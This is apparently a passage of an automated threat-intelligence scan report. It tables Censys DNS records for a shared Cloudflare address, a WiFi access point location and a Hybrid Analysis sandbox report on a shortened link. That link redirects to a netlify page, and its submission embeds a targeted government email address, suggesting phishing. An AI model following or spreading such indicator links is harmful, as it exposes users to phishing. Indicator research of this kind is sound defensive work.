gPEKIwNeq8Yai0pVnLlllLMVSWIHePNfLuLOdg9LDG1pq1rafu4Rgb-yc2Aoh4enGvHZkuRe6wlOLCDdREAADDoXkFVowEW_DGLxK1pMON0uU78NiTV9_r2o4osZBaOPn8heMmK90xPpnLokgH3gubppwq1gfmaT0RIIPWt7RVKpJRXQ_wSjLVjILALRXQY6PbelUym6TQ1z5fJfHRmrHxVnQvY6aogsFcFGtQVSrl8OCNEwv9P3oaH1GWxoSabHdrSKZmlLs2m-l9LJf4El9FKIA3NBr09u94xMLRSPmEHb4Ol-KPCw5RJiAwyBy2nrohjehlLLjGIgbGh_hTPi8G-yGwVEOyQB8GJBts_O8-g8mz65tw5NpdS_SbFPOasS6txd-b_DzeOnkkcJgqOwM_x3VH39HvzlVBkxqyTu-7yh1ffXA3EAxe-TkXe6foRnX1wH3iJh2_MCDDGxTOkk8Xj59t6wAawmHCKnU2CvogDUE">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13063',
cRay: '7c5f8c5e7988238a',
cHash: 'ba708169066f393',
cUPMDTk: "\/?__cf_chl_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'YtLw1r+G4BXsd0FkRMvka85wm7Lw/iR0rXUYENjW5JZbvNWZBYa0q0+Il8LjyNehJabAqUtaWf767wbCNaYgySnBqnpPsMoOa0cKWt1fZp4gdy+C8LU/pGEGRmyTt+1SC3FdTYu6cI8WiDs6EYfaolZ1Q4GzSM9aW8XcriqivgIDXT1BzBjJwTzpAp1U3aRGBhldnftnEosz5IN8cZ/ZfjD59KxZxCk4YJ82hAC/4p5NK53nkqtCB8+yebFdC+eEhhByuy+cDGuW019GQtjFSS9CeSHMkq0X5vvnjvWzUwgZWatWT4cb7H1DRCSbe56JnIW2SqUEUemPQIyx8r8XETw2r/jfEGJaIkWc0xNQcTIwyTo7s7DjvWVDpJZwE8RGlfo+XMla1yJOLJeQ4p8yS62WkxGCezqaUSIRC9W7/EJZB2hizQMBsQ33Qut7vH5/uRFNuCVFUoIv1B6FDgjnGpAfl6VMz5kByy7JL0ytkDTuSpiY63YcvOGMdbIIR3h4udGCBX1zULf54DaAq4yJPJFFrDJ28oS3TKgFFoFGJa2VsTR4xn/6LIYLPcOgI6uz',
t: 'MTY4Mzg2MTg2Mi4xNjAwMDA=',
m: 'c3pqWAYwgRkhuI1rZgTpwNhg2e/0sRGYZUtHGzVigsI=',
i1: 'NNf66iKUbSi3dpVZsq8TXQ==',
i2: 'dYlWHTj6TB0dDvgfdZy2xA==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5e7988238a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5e7988238a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:54:17 | Raw Data from RIRs | No | Censys | 0 | 0 | 4 | 0 | None | {"last_updated_at": "2023-05-11T22:57:58.234Z", "ip": "2606:4700:3037::6815:470e", "location_updated_at": "2023-05-08T07:47:25.051265Z", "autonomous_system_updated_at": "2023-05-08T07:47:25.051415Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"aimeetessendorff.com": {"record_type": "AAAA", "resolved_at": "2022-10-03T12:47:45.461955940Z"}, "repvetentieloc.ml": {"record_type": "AAAA", "resolved_at": "2022-11-19T15:10:10.180278821Z"}, "distschertertilise.cf": {"record_type": "AAAA", "resolved_at": "2023-05-11T12:54:07.597674627Z"}, "webmail.plafonpvcklaten.com": {"record_type": "AAAA", "resolved_at": "2022-10-23T13:56:03.189903700Z"}, "ciasanbeverroca.ga": {"record_type": "AAAA", "resolved_at": "2023-04-13T02:45:50.515988463Z"}, "newbabyswing.com": {"record_type": "AAAA", "resolved_at": "2023-01-14T15:30:21.414055738Z"}, "artisttel.com": {"record_type": "AAAA", "resolved_at": "2023-04-14T17:49:46.342407896Z"}, "bacmyto.gq": {"record_type": "AAAA", "resolved_at": "2023-04-29T17:30:56.299623606Z"}, "www.adwokat-pancerz.pl.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-05-03T02:35:21.068173226Z"}, "go789.ga": {"record_type": "AAAA", "resolved_at": "2023-05-11T17:34:21.509585450Z"}, "www.breakthruagent.com": {"record_type": "AAAA", "resolved_at": "2023-05-02T21:12:12.423073791Z"}, "copingarenna.tk": {"record_type": "AAAA", "resolved_at": "2023-01-16T17:49:52.827491940Z"}, "lakadestpageli.tk": {"record_type": "AAAA", "resolved_at": "2022-12-28T17:28:31.912298526Z"}, "lounch.com.br": {"record_type": "AAAA", "resolved_at": "2023-05-09T12:34:15.725375810Z"}, "easardo.gq": {"record_type": "AAAA", "resolved_at": "2022-12-05T14:57:48.157662110Z"}, "cosmicstory.info": {"record_type": "AAAA", "resolved_at": "2022-09-26T02:33:11.327006722Z"}, "trueallureforevershinejewelry.com": {"record_type": "AAAA", "resolved_at": "2023-04-04T16:44:01.264807017Z"}, "clean.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-01T03:09:37.177595997Z"}, "maycijackmo.gq": {"record_type": "AAAA", "resolved_at": "2023-01-02T14:40:23.496602167Z"}, "domainwheel.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-04T22:48:08.612020608Z"}, "take2s.com": {"record_type": "AAAA", "resolved_at": "2023-04-26T16:42:32.449014857Z"}, "zouksedalme.cf": {"record_type": "AAAA", "resolved_at": "2023-01-08T12:26:58.333904645Z"}, "mistwarctolylong.tk": {"record_type": "AAAA", "resolved_at": "2023-05-09T21:26:33.070368065Z"}, "wiki.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-01T03:09:37.887086684Z"}, "slanchogled.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-07T10:10:31.489137012Z"}, "ciorabutnewsmort.cf": {"record_type": "AAAA", "resolved_at": "2023-05-11T12:54:31.076583498Z"}, "offer.buyulti-charge.com": {"record_type": "AAAA", "resolved_at": "2023-04-28T14:39:01.965135008Z"}, "cloud.topmax.dev": {"record_type": "AAAA", "resolved_at": "2022-11-09T14:16:47.770763186Z"}, "tiaticviwatch.cf": {"record_type": "AAAA", "resolved_at": "2023-05-03T12:47:13.799688411Z"}, "fisbopowertools.com": {"record_type": "AAAA", "resolved_at": "2023-04-25T14:43:38.993993919Z"}, "dgvsm.com": {"record_type": "AAAA", "resolved_at": "2023-03-18T21:11:44.668409595Z"}, "it-a-br-newcarok.live": {"record_type": "AAAA", "resolved_at": "2023-04-29T18:23:19.166151443Z"}, "buyulti-charge.com": {"record_type": "AAAA", "resolved_at": "2023-05-02T14:32:56.241553693Z"}, "ritsar.abk.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-03T22:17:27.736952452Z"}, "www.advocateclaims.com": {"record_type": "AAAA", "resolved_at": "2023-05-04T13:25:19.560491085Z"}, "hkjku-liop.valentiona890.workers.dev": {"record_type": "AAAA", "resolved_at": "2023-04-21T17:17:14.415081307Z"}, "hotel-taormina.info": {"record_type": "AAAA", "resolved_at": "2023-05-04T18:10:13.310895111Z"}, "blacklotusaudio.com": {"record_type": "AAAA", "resolved_at": "2023-01-02T13:02:23.981054734Z"}, "cdn.babeenineurope.com": {"record_type": "CNAME", "resolved_at": "2023-04-30T19:28:04.759393053Z"}, "routsaygeehekdest.ga": {"record_type": "AAAA", "resolved_at": "2023-04-14T02:12:59.832119313Z"}, "www.farasoacademy.com": {"record_type": "AAAA", "resolved_at": "2023-04-24T14:37:26.546680400Z"}, "7lakesholidays.co.uk": {"record_type": "AAAA", "resolved_at": "2023-05-11T21:51:15.077407211Z"}, "cumslocals.com": {"record_type": "AAAA", "resolved_at": "2023-04-02T14:31:43.668953015Z"}, "www.mischerhexe.de": {"record_type": "AAAA", "resolved_at": "2023-05-11T16:40:14.150921538Z"}, "gjtyew-bodf.valentiona890.workers.dev": {"record_type": "AAAA", "resolved_at": "2023-04-20T20:28:09.792148401Z"}, "brousebiology.com": {"record_type": "AAAA", "resolved_at": "2023-02-02T13:05:34.500687558Z"}, "www.brevardnc.org": {"record_type": "AAAA", "resolved_at": "2023-05-07T21:13:44.303349330Z"}, "dubadub.com": {"record_type": "AAAA", "resolved_at": "2023-05-04T14:40:56.310744261Z"}, "martohacabe.ga": {"record_type": "AAAA", "resolved_at": "2023-05-07T17:27:25.826314650Z"}, "og-e-designscanada.com": {"record_type": "AAAA", "resolved_at": "2022-11-02T14:00:37.786101267Z"}, "nencafuvilate.ml": {"record_type": "AAAA", "resolved_at": "2023-05-10T18:02:40.500759466Z"}, "searchtermresults.com": {"record_type": "AAAA", "resolved_at": "2023-04-27T16:36:47.951727992Z"}, "cdn-1.babeenineurope.com": {"record_type": "CNAME", "resolved_at": "2023-04-30T14:00:08.829408117Z"}, "cundasithumbnoda.tk": {"record_type": "AAAA", "resolved_at": "2023-05-10T20:49:51.989235614Z"}, "www.24hrupdate.online": {"record_type": "AAAA", "resolved_at": "2023-03-22T20:33:59.416609462Z"}, "www.sripersada.com": {"record_type": "AAAA", "resolved_at": "2022-11-19T14:03:00.698431487Z"}, "kids.abk.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-07T22:13:24.698234660Z"}, "sentimelt.com": {"record_type": "AAAA", "resolved_at": "2023-04-23T16:01:11.742725624Z"}, "walledgarden.global": {"record_type": "AAAA", "resolved_at": "2023-05-03T00:39:45.829214813Z"}, "xn--b1agjto.xn--p1acf": {"record_type": "AAAA", "resolved_at": "2023-05-01T03:13:25.943966163Z"}, "nieqiulemoru.gq": {"record_type": "AAAA", "resolved_at": "2023-05-03T17:22:24.190764207Z"}, "renalfa.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-08T22:47:46.479184263Z"}, "mujeresalaobra.org": {"record_type": "AAAA", "resolved_at": "2023-05-08T21:50:08.391075868Z"}, "hbomedtoday.com": {"record_type": "AAAA", "resolved_at": "2023-05-09T14:49:34.524954322Z"}, "fatdomisecools.cf": {"record_type": "AAAA", "resolved_at": "2023-05-11T12:54:22.776371266Z"}, "tegafoods.mx": {"record_type": "AAAA", "resolved_at": "2023-04-26T19:27:47.975723009Z"}, "www.a2zbiotics.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-04-28T20:07:55.631943899Z"}, "aaditrifood.com": {"record_type": "AAAA", "resolved_at": "2022-09-30T12:45:20.759363789Z"}, "baklibabsaringram.cf": {"record_type": "AAAA", "resolved_at": "2023-05-07T12:50:08.988220251Z"}, "ylcaloketpmentluv.gq": {"record_type": "AAAA", "resolved_at": "2022-12-13T15:15:42.169837303Z"}, "certidao.srv.br": {"record_type": "AAAA", "resolved_at": "2023-05-10T12:45:01.697407879Z"}, "anactikazida.ga": {"record_type": "AAAA", "resolved_at": "2023-04-30T22:52:35.596026353Z"}, "abkapp.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-04-16T21:06:58.495246539Z"}, "nowbiggerwithgta.com": {"record_type": "AAAA", "resolved_at": "2022-12-26T00:35:04.859173648Z"}, "mail.feitonodigital.com": {"record_type": "AAAA", "resolved_at": "2023-05-05T14:30:55.716361269Z"}, "www.cienciaexamanismo.com.br": {"record_type": "AAAA", "resolved_at": "2022-10-28T12:17:10.511292940Z"}, "conimexsa.com": {"record_type": "AAAA", "resolved_at": "2023-05-09T14:25:21.075230785Z"}, "neglectmillspark.buzz": {"record_type": "AAAA", "resolved_at": "2023-04-07T12:49:27.362981875Z"}, "brevardnc.org": {"record_type": "AAAA", "resolved_at": "2023-05-10T20:15:03.687712788Z"}, "garluco.ga": {"record_type": "AAAA", "resolved_at": "2023-04-27T18:33:39.654380379Z"}, "auth.gay": {"record_type": "AAAA", "resolved_at": "2023-05-08T17:54:43.280273275Z"}, "www.tizhoo.ir": {"record_type": "AAAA", "resolved_at": "2022-12-03T15:10:06.028885766Z"}, "road.vipe.us": {"record_type": "AAAA", "resolved_at": "2023-05-05T20:38:50.973706563Z"}, "gusteiplexmola.tk": {"record_type": "AAAA", "resolved_at": "2023-03-27T05:18:03.996467271Z"}, "diageherpost.ga": {"record_type": "AAAA", "resolved_at": "2023-04-24T17:33:56.882157561Z"}, "pennportcoun.tk": {"record_type": "AAAA", "resolved_at": "2023-05-01T20:45:04.713699318Z"}, "zunbazapecomfo.tk": {"record_type": "AAAA", "resolved_at": "2023-05-10T20:52:13.680560969Z"}, "tiosmarigin.tk": {"record_type": "AAAA", "resolved_at": "2023-03-11T19:39:44.575906671Z"}, "buvade.ml": {"record_type": "AAAA", "resolved_at": "2023-04-27T19:50:04.921168507Z"}, "webmail.sylhetbarta24.com": {"record_type": "AAAA", "resolved_at": "2023-02-11T14:21:26.991769121Z"}, "taapakspices.com": {"record_type": "AAAA", "resolved_at": "2023-04-27T16:57:37.830395205Z"}, "autodiscover.dfwtaxi.org": {"record_type": "AAAA", "resolved_at": "2023-05-07T21:15:13.192169963Z"}, "merrellphboots.com": {"record_type": "AAAA", "resolved_at": "2022-11-30T19:31:43.146946537Z"}, "webmail.cienciaexamanismo.com.br": {"record_type": "AAAA", "resolved_at": "2022-10-24T12:18:30.715835062Z"}, "cpcontacts.dailytungipara.com": {"record_type": "AAAA", "resolved_at": "2023-04-12T14:38:48.746210759Z"}, "mail.kasabugraphics.com": {"record_type": "AAAA", "resolved_at": "2023-05-05T14:52:30.444010315Z"}, "jadehost.xyz": {"record_type": "AAAA", "resolved_at": "2022-11-02T17:53:20.233482468Z"}, "searhasbsub.tk": {"record_type": "AAAA", "resolved_at": "2023-05-11T21:42:54.350620579Z"}, "vikk-play.space": {"record_type": "AAAA", "resolved_at": "2023-01-29T18:05:12.078217209Z"}, "edocoutercenma.ml": {"record_type": "AAAA", "resolved_at": "2023-04-29T18:29:25.411014530Z"}}, "names": ["mail.feitonodigital.com", "go789.ga", "nowbiggerwithgta.com", "searchtermresults.com", "hotel-taormina.info", "webmail.cienci | 2606:4700:3037::6815:470e |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | a-zoom (Net ID: 00:01:38:D4:87:A3) | 37.780462,-122.390564 |
| 2023-05-12 02:57:26 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://rebrand.ly/zkdr5qh', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [u'18.232.255.120', u'35.229.48.116', u'52.20.78.240'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://rebrand.ly/zkdr5qh#cbk%40cbk.gov.kw', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"18.232.255.120:443"\n "8.249.23.254:80"\n "192.124.249.23:80"\n "35.229.48.116:443"\n "104.17.24.14:443"\n "52.20.78.240:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.godaddy.com"\n "ocsp.sectigo.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ef4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ef4_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ef4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3828"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ef4_IESQMMUTEX_0_331"\n "IsoScope_ef4_ConnHashTable<3828>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ef4_IE_EarlyTabStart_0xc2c_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003252]\n "07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D]- [targetUID: 00000000-00003252]\n "51C778D1B3D7448EC0DA4AE3D4980DFC_A397D18A0CD6D90D198AF5B25C97EE7F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\51C778D1B3D7448EC0DA4AE3D4980DFC_A397D18A0CD6D90D198AF5B25C97EE7F]- [targetUID: 00000000-00003252]\n "EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D]- [targetUID: 00000000-00003252]\n "CA7EF15DA1A3F288F2EC1D2ED9F27BE3" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CA7EF15DA1A3F288F2EC1D2ED9F27BE3]- [targetUID: 00000000-00003252]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003828]\n "KWL532KX.htm" has type "HTML document ASCII text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\KWL532KX.htm]- [targetUID: 00000000-00003252]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003252]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003252]\n "~DFEB7596C6C011B031.TMP" has type "data"- Location: [%TEMP%\\~DFEB7596C6C011B031.TMP]- [targetUID: 00000000-00003828]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003252]\n "2WBPSNI5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2WBPSNI5.txt]- [targetUID: 00000000-00003828]\n "WZONAU8G.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WZONAU8G.txt]- [targetUID: 00000000-00003252]\n "B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E]- [targetUID: 00000000-00003252]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /zkdr5qh HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rebrand.ly\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_18.232.255.120]\n\n "HTTP/1.1 301 Moved Permanently\nCache-Control: no-cache, no-store\nDate: Tue, 26 Jul 2022 05:21:46 GMT\nEngine: Rebrandly.redirect, version 2.1\nExpires: -1\nLocation: https://merry-sawine-195b34.netlify.app/\nStrict-Transport-Security: max-age=15552000\nContent-Length: 0\nConnection: keep-alive"- [Source: SSL_18.232.255.120]\n\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: merry-sawine-195b34.netlify.app"- [Source: SSL_35.229.48.116]\n\n "r$zoN! ;nBZJMV#!?GbQGW E.Sp"ooG+lS]>on f\nthItg]VF4vfw_lB!\\X@LAj6P$aA\n6n^ @ORR?HP3}]m^F9\nn>|1GEx(}.qEW6u%w[ )]|d <q??Bs|\n P]{3\n\\w]V1?~8o<+KTVh{E{P[$H>{miLwILxY%Gz.P\n$o\\E&BXx 9/Pxx>q|:OG~&8d~kX~W}mF;\nj=1#E_X^"tH~c>by;gDYzb8kV*"`d^E|;tu>xbrbb>A5&mich2/F>s4uqav:t_"lc:*+|T#wy|Ja)CBU_\n&.y3a$>SyR~x>i|:O?S>#QYrkw1N{\n75:gdvkkz_:+9+?WO_\nFBR\\pHkzU12$p0G!<|b`7/x|:|?WVJ37{h7cpul!\\wF q:.Ko>v6,r#FL-=@A\'{t:|drMo _/__)7S{O/Mw6S?R;e"&s52$QK\'Tvw_ljOH,="PF6AJ`<0X}pK2WF/1|k\n5_A|:OG|bO}>)rhh5&SkD/7UrV,,>7RrJ7q=eUS UpU[Fgly%5e_oI[ @Kow\'nZg}__/;iPBx 7yT|TGBM\'rri\n<n"{4b#V.Uw\noo@Bx3[G^,Vb6z;^G\n; ;F|<4Otw>Au>IS>}>SU^W)" {*" :@O!qh_wV!,KpAwiT)bf*j%JWP&` AVkw~!V)"U\njFw>.yG|bO#b"@B-"Phw\\f{.hH)~xJb;5OyCMU R3^eG4pj#"Z__)/BL$~\n>}/x=0~GImT/BzgKzz\\UyKJ+y~1i\n~H*S}#KOPW\'kG>}\n||G~)+n_|EGHed[8Rwv5o)~<Av5on>Xb((?\\wz[,@+h6-FZGVO1^_+~%~/F>}0~jO2"- [Source: SSL_35.229.48.116]\n, "#hO^`$c\'~_BwW(7\nZB~o1^\\WoOoo|7PU}a|_t{Xif8wx)\'\'F|~~Oq}~p|oLB|\'V>1b``W[t%AU>y0b?F6i4~?V$6R{M?{q`y?cJ>Ov\n<b}+<K,6r3xqx|t;![$1~G;HP>^>_z4YGzNb0q f:g\\+<H_yqA-hwH@o;Xi^dJ~Gs?{)nO}L) {,!dHD)"- [Source: SSL_35.229.48.116]\n, "& {&ReB=z{~O@#~8"6Stw<h4_{t$V}p\'fThJ3Q?!(3_{KJ0?c%KjHE|V:WL!X%7`>d_5?[~\n+#a> o3&i:[9or;1`Zt!T*^>2sL#b{sT>_\nO%F\nwW}*wMCQrE=&?~O=3Ypg$SHSw2hn:q<S?%G~eHnFR-}9\'dCUw]\neh@!P<TqPU7|o|?*5@Cd6|;)o~X5{OokVu27l;jS>OObD\ni~x&hI}T~?@(6\'#1Hro_z*Lq\'^r;*0PQ-_:#G!?M8_5BcjV2u2A\nO62O\nxxrX?8~}oWG<8w1}sz-Y3*101)HB?EWA{~>\'5jy;\'1?>I[:T8ZU!3x9qV*\n5<"YKH:xy4s9Bu+EF>~\nc|FO-7F}U,Uv"aDNQOQ_#?CPoQ_E2{|bbNH*B#>nS>B{*t!GD3!HS~^xsx?"B7:Gy`gBbc`c=q<G|Q~?;_TCFDoKvUcRU!S@| FGGxMFBHG@Al4e}/o12F8>wc?WXab_x\\5qUAH|q~}hLP8jc6EVMQ|A#Sx?+3WW)kB8e|$Pp*w<^\n~8^NUJ":_c$I<;8?f?|2~j[r~/|KNSEC?n[B|b)i1;3+Ozp*?C@a;s_Eb;l?8n\nkN:~.UJU3z}:3O5Cpmw3e\n?n2?k>RxDA<P!HHn\\gE^&!F{3{c(xgG}j*4}4O?deO}W?zDA\\q\n&{QR[ob>(?b|d~C{\nnFKh<dox\\xaOS,f_doN4_*F#>/?Qq|NJ1^n\nW%Roc;C|=8v0$;N5a|\'P\nz;;xKh<?t(?~>bOayK(~d{bmg<Cv7|R~/Vxp<AHHGox%Kn/?x|NoG<}?2T:}}~/?D4`N,FjiG}({0\n4|}W9(\n@ES?5oz2>:_2%DK\n?vCRUgOM/;7\nG?=(?|W,_c|v"m\\^sOL~,R;~Kc$^Xj\n|OTS?>o<79aA|9,g/ypoOvius}/}<~]2jOZ(F_|HOSJ>^a]G<u0(GeO>!!~Csw3e~+skKzo9F\n%Pu)FBH>|#q!\n?X&<=Wr{(hiT!F*oo/4>S3~o*O>A#_bdV5<7/7}n\'.|xXZ]U<#yZDm3(NH_k~|YJ\n(/[:a|yv\'D]hdYESKmH>\n})?nU81_7)|#@+5dWaW!<"DkDOKxq ^y>C}yA.&iaKB>#*iIB.P!<p-*$H_XU\nhBe(2~]_^ N~_IpCi_`3P%Ni\n\nh$_g~9(JhD" vHEefM\n_Ptgw";c39UeCG&O;T}ar*O?Gc|<s/Dq0A;.^_a%?=\nr,oG(3 <yohoS0Bx"B-7%#X | 35.229.48.116 |
